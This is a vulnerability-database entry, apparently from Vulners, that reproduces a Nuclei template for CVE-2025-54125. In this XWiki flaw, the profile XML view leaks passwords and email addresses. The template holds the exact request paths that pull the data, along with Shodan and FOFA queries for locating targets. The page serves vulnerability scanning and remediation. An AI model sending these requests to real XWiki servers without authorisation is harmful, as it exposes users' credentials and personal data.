Lucene search
K

XWiki XML View - Sensitive Information Exposure

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

XWiki XML view may reveal passwords and email addresses stored in custom fields on user profiles.

Related
Refs
Code
id: CVE-2025-54125

info:
  name: XWiki XML View - Sensitive Information Exposure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in XWiki's XML view functionality exposes sensitive information such as passwords and email addresses that are stored in custom fields not explicitly named as password or email. This information disclosure occurs when accessing user profiles with the xml.vm template.
  impact: |
    Unauthenticated attackers can access sensitive information including passwords and email addresses stored in custom user profile fields through the XML view functionality.
  remediation: |
    Upgrade XWiki to the latest version that properly protects sensitive custom fields in XML view outputs.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-22810
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-359
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,exposure,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{path}}"

    payloads:
      path:
        - "/bin/view/XWiki/{{username}}?xpage=xml"
        - "/xwiki/bin/view/XWiki/{{username}}?xpage=xml"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type, 'text/xml')"
          - "contains_all(body, '<users>', '<property>', '<author>', '<email>')"
        condition: and
# digest: 4b0a00483046022100f9cce9bd0b5df9b75e7eaaf77b3c4c1beef0b01edea98c0f6b29c235f309e3c2022100a7491063759be67388c118d783427dd51b6b880517d8939332236b0b6ee5e8b2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.5
CVSS 48.7
EPSS0.01285
SSVC
8